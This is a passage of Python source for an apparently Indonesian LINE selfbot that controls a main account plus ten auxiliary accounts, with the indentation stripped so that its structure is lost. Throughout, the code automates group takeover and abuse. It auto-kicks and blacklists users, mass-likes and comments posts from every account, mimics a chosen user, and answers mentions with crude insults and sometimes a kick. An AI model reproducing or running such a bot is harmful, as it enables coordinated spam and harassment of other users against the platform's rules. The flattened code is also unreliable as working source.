if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "uf9769adcf23329d9caedcd850f6caea8":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if wait["AutoKick"] == True:
try:
if op.param3 in admsa:
if op.param3 in admin:
if op.param3 in Bots:
pass
if op.param2 in admsa:
if op.param2 in admin:
if op.param2 in Bots:
pass
else:
ki.kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
ki2.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in admsa:
if op.param2 not in admin:
if op.param2 not in Bots:
ki3.kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
ki4.inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admsa:
if op.param2 in admin:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admsa:
if op.param2 in admin:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
if mid in op.param3:
if op.param2 in admsa:
if op.param2 in Bots:
pass
try:
ki5.kickoutFromGroup(op.param1,[op.param2])
ki6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki7.kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if admsa in op.param3:
if admin in op.param3:
if op.param2 in Bots:
pass
try:
ki8.kickoutFromGroup(op.param1,[op.param2])
ki9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param2 not in Bots:
ki10.kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
ki.inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
ki2.inviteIntoGroup(op.param1,[op.param3])
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1002)
ki2.like(url[25:58], url[66:], likeType=1004)
ki3.like(url[25:58], url[66:], likeType=1003)
ki4.like(url[25:58], url[66:], likeType=1001)
ki5.like(url[25:58], url[66:], likeType=1002)
ki6.like(url[25:58], url[66:], likeType=1004)
ki7.like(url[25:58], url[66:], likeType=1003)
ki8.like(url[25:58], url[66:], likeType=1001)
ki9.like(url[25:58], url[66:], likeType=1002)
ki10.like(url[25:58], url[66:], likeType=1004)
cl.comment(url[25:58], url[66:], wait["comment"])
ki.comment(url[25:58], url[66:], wait["comment1"])
ki2.comment(url[25:58], url[66:], wait["comment2"])
ki3.comment(url[25:58], url[66:], wait["comment3"])
ki4.comment(url[25:58], url[66:], wait["comment4"])
ki5.comment(url[25:58], url[66:], wait["comment5"])
ki6.comment(url[25:58], url[66:], wait["comment6"])
ki7.comment(url[25:58], url[66:], wait["comment7"])
ki8.comment(url[25:58], url[66:], wait["comment8"])
ki9.comment(url[25:58], url[66:], wait["comment9"])
ki10.comment(url[25:58], url[66:], wait["comment10"])
cl.sendText(msg.to,"Like Success")
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki3.sendText(msg.to,text)
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
ki2.sendText(msg.to,data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Ngetag Lagi Yawloh " + cName + "\n! Sorry, Byee!!!"]
ret_ = random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
ki2.kickoutFromGroup(msg.to,[msg.from_])
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = ki.getContact(msg.from_)
cName = contact.displayName
balas = ["Gosah TAG-TAG " + cName + " JEMBOTT!!!","Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja " + cName ,"Woii " + cName + " Jangan Ngetag, Riibut!","Yawloh,, Jones Karatan " + cName + " NgeTag!!","Ono Opo MBOTT" + cName + " NgeTag-Tag!!"]
ret_ = random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
ki.sendText(msg.to,ret_)
rnd = ["Buset si joness ngetag mulu, kalo penting langsung pe em riyan nya aja","Ni orang kerjaan nya ngetag mulu, gift tikel aja enggak pernah, suwe lu jamban"]
p = random.choice(rnd)
lang = 'id'
tts = gTTS(text=p, lang=lang)
tts.save("hasil.mp3")
ki.sendAudio(msg.to,"hasil.mp3")
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "145",
"STKPKGID": "2",
"STKVER": "100" }
ki.sendMessage(msg)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention2"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Gosah TAG-TAG " + cName + " JEMBOTT!!!","Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja " + cName ,"Woii " + cName + " Jangan Ngetag, Riibut!","Yawloh,, Jones Karatan " + cName + " NgeTag!!","Ono Opo MBOTT" + cName + " NgeTag-Tag!!"]
ret_ = random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "2754644",
"STKPKGID": "1066653",
"STKVER": "1" }
cl.sendMessage(msg)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention3"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["" + cName + ", Jadilah Jones Alami Yang Nggak Suka NgeTag Orang Ganteng"]
balas1 = "Selfie dulu ya Cet. . ."
ret_ = random.choice(balas)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.sendText(msg.to,balas1)
cl.sendImageWithURL(msg.to,image)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "20470229",
"STKPKGID": "1604391",
"STKVER": "1" }
cl.sendMessage(msg)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention4"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Gosah TAG-TAG " + cName + " JEMBOTT!!!","Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja " + cName ,"Woii " + cName + " Jangan Ngetag, Riibut!","Yawloh,, Jones Karatan " + cName + " NgeTag!!","Ono Opo MBOTT " + cName + " NgeTag-Tag!!"]
ret_ = random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
rnd = ["Buset si joness ngetag mulu, kalo penting langsung pe em riyan nya aja","Ni orang kerjaan nya ngetag mulu, gift tikel aja enggak pernah, suwe lu jamban"]
p = random.choice(rnd)
lang = 'id'
tts = gTTS(text=p, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "15913016",
"STKPKGID": "1413652",
"STKVER": "1" }
cl.sendMessage(msg)
break
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki2.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki.findAndAddContactsByMid(target)
ki.inviteIntoGroup(msg.to,[target])
ki2.sendText(msg.to,"Done Invite : \n➡" + _name)
#wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
#wait["winvite"] = False
except:
ki.sendText(msg.to,"Negative, Error detected")
#wait["winvite"] = False
break
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["invite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["invite"] = False
break
except:
try:
cl.findAndAddContactsByMid(invite)
cl.inviteIntoGroup(op.param1,[invite])
wait["invite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["invite"] = False
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
filler = "『 Sticker Check 』\nSTKID : %s\nSTKPKGID : %s\nSTKVER : %s\n『 Link 』\nline://shop/detail/%s" % (stk_id,pkg_id,stk_ver,pkg_id)
cl.sendText(msg.to, filler)
#wait["sticker"] = False
else:
pass
if wait["alwaysRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["Timeline"] == True:
msg.contentType = 0
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
ki.sendText(msg.to,msg.text)
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Kasih help","help","[∆√ cувєя тк™ √∆]"]:
if msg.from_ in admin:
cl.sendText(msg.to,helpMessage)
cl.sendText(msg.to,"『Dilarang Typo Tanpa Izin Dari Owner』")
elif msg.text in ["Ryan key","help","[∆√ cувєя тк™ √∆]"]:
if msg.from_ in admin:
cl.sendText(msg.to,ryanMessage)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
elif msg.text in ["Respon1 on"]:
if msg.from_ in admin:
wait["detectMention"] = True
wait["detectMention2"] = False
wait["detectMention3"] = False
wait["detectMention4"] = False
wait["kickMention"] = False
ki.sendText(msg.to,"Auto Respon1 Sudah Aktif")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon1 off"]:
if msg.from_ in admin:
wait["detectMention"] = False
ki.sendText(msg.to,"Auto Respon1 Sudah Off")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon2 on"]:
if msg.from_ in admin:
wait["detectMention"] = False
wait["detectMention2"] = True
wait["detectMention3"] = False
wait["detectMention4"] = False
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Respon2 Sudah Aktif")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon2 off"]:
if msg.from_ in admin:
wait["detectMention2"] = False
cl.sendText(msg.to,"Auto Respon2 Sudah Off")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon3 on"]:
if msg.from_ in admin:
wait["detectMention"] = False
wait["detectMention2"] = False
wait["detectMention3"] = True
wait["detectMention4"] = False
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Respon3 Sudah Aktif")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon3 off"]:
if msg.from_ in admin:
wait["detectMention3"] = False
cl.sendText(msg.to,"Auto Respon3 Sudah Off")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon4 on"]:
if msg.from_ in admin:
wait["detectMention"] = False
wait["detectMention2"] = False
wait["detectMention3"] = False
wait["detectMention4"] = True
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Respon4 Sudah Aktif")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon4 off"]:
if msg.from_ in admin:
wait["detectMention4"] = False
cl.sendText(msg.to,"Auto Respon4 Sudah Off")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Responkick on"]:
if msg.from_ in admin:
wait["kickMention"] = True
wait["detectMention"] = False
wait["detectMention2"] = False
wait["detectMention3"] = False
wait["detectMention4"] = False
cl.sendText(msg.to,"Auto Respon Kick Sudah Aktif")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Responkick off"]:
if msg.from_ in admin:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Respon Kick Di Nonaktifkan")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["AllRespon on"]:
if msg.from_ in admin:
wait["detectMention"] = True
wait["detectMention2"] = True
wait["detectMention3"] = True
wait["detectMention4"] = True
wait["kickMention"] = True
cl.sendText(msg.to,"Semua Auto Respon Sudah Aktif")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["AllRespon off"]:
if msg.from_ in admin:
wait["detectMention"] = False
wait["detectMention2"] = False
wait["detectMention3"] = False
wait["detectMention4"] = False
wait["kickMention"] = False
cl.sendText(msg.to,"Semua Auto Respon Sudah Nonaktif")
else:
ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Bot:inv on"]:
if msg.from_ in admin:
wait["winvite"] = True
ki.sendText(msg.to,"Bot Invite : Enable")
elif msg.text in ["Bot:inv off"]:
if msg.from_ in admin:
wait["winvite"] = False
ki.sendText(msg.to,"Bot Invite : Disable")
elif msg.text in ["K on","Contact on"]:
wait["contact"] = True
cl.sendText(msg.to,"Contact Sudah Aktif")
elif msg.text in ["K off","Contact off"]:
wait["contact"] = False
cl.sendText(msg.to,"Contact Sudah Di Nonaktifkan")
elif msg.text in ["Alwaysread on"]:
wait["alwaysRead"] = True
cl.sendText(msg.to,"Always Read Sudah Aktif")
elif msg.text in ["Alwaysread off"]:
wait["alwaysRead"] = False
cl.sendText(msg.to,"Always Read Sudah Di Nonaktifkan")
elif ("Gn:" in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gn:","")
ki.updateGroup(group)
else:
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok👈")
elif ("Gn " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gn ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["timeline"]:
try:
url = cl.activity(limit=5)
cl.sendText(msg.to,url['result']['posts'][0]['postInfo']['postId'])
except Exception as E:
print E
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:","")
cl.kickoutFromGroup(msg.to,[midd])
elif "Invite:" in msg.text:
midd = msg.text.replace("Invite:","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "Bots" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki7mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki8mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki9mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
msg.contentMetadata = {'mid': ki10mid}
cl.sendMessage(msg)
time.sleep(0.0)
msg.contentType = 13
elif "Rey1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "Rey2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "Rey3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "Rey4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Inggris----\n" + "" + result)
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Inggris----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Thailand----\n" + "" + result)
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Thailand----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Fancytext " in msg.text:
txt = msg.text.replace("Fancytext ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif msg.text in ["Rey1 Gift","Bot1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Rey2 Gift","Bot2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Rey3 Gift","Bot3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Rey4 Gift","Bot4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Auto like"]:
wait["likeOn"] = True
cl.sendText(msg.to,"『Auto Like DiAktifkan』")
elif msg.text in ["Like off"]:
wait["likeOn"] = False
cl.sendText(msg.to,"『Auto Like Di Nonaktifkan』")
elif msg.text in ["Rey Cancel","Cancel dong","B cancel"]:
if msg.toType == 2:
group = ki.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Davet yok😤")
else:
ki.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Tidak ada undangan")
else:
ki.sendText(msg.to,"invitan tidak ada")
elif msg.text in ["Cancel","cancel"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No is Invite✍😤")
else:
ki.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Tidak ada undangan👈")
else:
ki.sendText(msg.to,"invitan tidak ada")
elif "gurl" == msg.text:
print cl.getGroup(msg.to)
cl.sendMessage(msg)
elif "rey gurl" == msg.text:
print ki.getGroup(msg.to)
ki.sendMessage(msg)
elif msg.text in ["Link on"]:
if msg.toType == 2:
group = ki.getGroup(msg.to)
group.preventJoinByTicket = False
ki.updateGroup(group)
if wait["lang"] == "JP":
ki.sendText(msg.to,"URL on ✍")
ki2.sendText(msg.to,"URL on ✍")
ki3.sendText(msg.to,"URL on ✍")
ki4.sendText(msg.to,"URL on ✍")
ki5.sendText(msg.to,"URL on ✍")
ki6.sendText(msg.to,"URL on ✍")
ki7.sendText(msg.to,"URL on ✍")
ki8.sendText(msg.to,"URL on ✍")
ki9.sendText(msg.to,"URL on ✍")
ki10.sendText(msg.to,"URL on ✍")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
ki.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["Link off"]:
if msg.toType == 2:
group = ki.getGroup(msg.to)
group.preventJoinByTicket = True
ki.updateGroup(group)
if wait["lang"] == "JP":
ki.sendText(msg.to,"URL Closed ✍")
ki2.sendText(msg.to,"URL Closed ✍")
ki3.sendText(msg.to,"URL Closed ✍")
ki4.sendText(msg.to,"URL Closed ✍")
ki5.sendText(msg.to,"URL Closed ✍")
ki6.sendText(msg.to,"URL Closed ✍")
ki7.sendText(msg.to,"URL Closed ✍")
ki8.sendText(msg.to,"URL Closed ✍")
ki9.sendText(msg.to,"URL Closed ✍")
ki10.sendText(msg.to,"URL Closed ✍")
else:
ki.sendText(msg.to,"URL Kapalí ✍")
ki2.sendText(msg.to,"URL Kapalí ✍")
ki3.sendText(msg.to,"URL Kapali ✍")
ki4.sendText(msg.to,"URL Kapali ✍")
ki5.sendText(msg.to,"URL Kapali ✍")
ki6.sendText(msg.to,"URL Kapali ✍")
ki7.sendText(msg.to,"URL Kapali ✍")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif "Ginfo" == msg.text:
ginfo = ki.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
ki.sendText(msg.to,"[Nama]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nAnggota:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
ki.sendMessage(msg)
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif "Mymid" == msg.text:
cl.sendText(msg.to,mid)
elif "Rey1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "Rey2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "Rey3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
